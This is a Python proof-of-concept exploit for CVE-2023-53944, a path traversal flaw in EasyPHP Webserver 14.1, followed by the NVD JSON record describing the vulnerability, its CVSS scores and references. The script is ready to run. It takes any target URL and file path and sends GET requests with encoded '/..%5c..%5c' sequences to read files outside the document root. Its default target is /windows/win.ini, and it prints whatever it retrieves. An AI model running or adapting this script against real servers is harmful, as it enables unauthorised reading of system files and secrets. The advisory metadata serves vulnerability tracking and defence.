CVE-2023-53944

import requests import sys # CVE-2023-53944 PoC - EasyPHP Webserver Path Traversal # Target: EasyPHP Webserver 14.1 # Vulnerability: Path traversal via encoded directory traversal sequences def exploit(target_url, file_path='/windows/win.ini'): """ Exploit path traversal vulnerability in EasyPHP Webserver Args: target_url: Base URL of the vulnerable server file_path: Path to the file to read (default: Windows system file) Returns: Content of the requested file if successful, None otherwise """ # Encode the path traversal sequence using %5c (encoded backslash) # Pattern: /..%5c..%5c + target file path encoded_path = file_path.replace('/', '%5c').replace('\\', '%5c') traversal = '/..%5c..%5c' # Construct the malicious URL exploit_url = f"{target_url.rstrip('/')}{traversal}{encoded_path}" print(f"[*] Target URL: {exploit_url}") print(f"[*] Attempting to read: {file_path}") try: # Send HTTP GET request response = requests.get(exploit_url, timeout=10) if response.status_code == 200: print(f"[!] Success! File content retrieved:") print("-" * 50) print(response.text) print("-" * 50) return response.text else: print(f"[*] Request failed with status code: {response.status_code}") return None except requests.exceptions.RequestException as e: print(f"[!] Error: {e}") return None if __name__ == '__main__': if len(sys.argv) < 2: print("Usage: python cve-2023-53944.py <target_url> [file_path]") print("Example: python cve-2023-53944.py http://target.com /windows/win.ini") sys.exit(1) target = sys.argv[1] file_path = sys.argv[2] if len(sys.argv) > 2 else '/windows/win.ini' exploit(target, file_path)

{"cve": {"id": "CVE-2023-53944", "sourceIdentifier": "[email protected]", "published": "2025-12-18T20:15:53.097", "lastModified": "2025-12-26T16:55:30.663", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "EasyPHP Webserver 14.1 contains a path traversal vulnerability that allows remote users with low privileges to access files outside the document root by bypassing SecurityManager restrictions. Attackers can send GET requests with encoded directory traversal sequences like /..%5c..%5c to read system files such as /windows/win.ini."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:easyphp:webserver:14.1:*:*:*:*:*:*:*", "matchCriteriaId": "25E85EE7-0612-4478-A212-5E5F90944A3D"}]}]}], "references": [{"url": "https://www.easyphp.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/51430", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://www.vulncheck.com/advisories/easyphp-webserver-path-traversal-via-directory-traversal-sequences", "source": "[email protected]", "tags": ["Third Party Advisory", "Exploit"]}, {"url": "https://www.exploit-db.com/exploits/51430", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit"]}]}}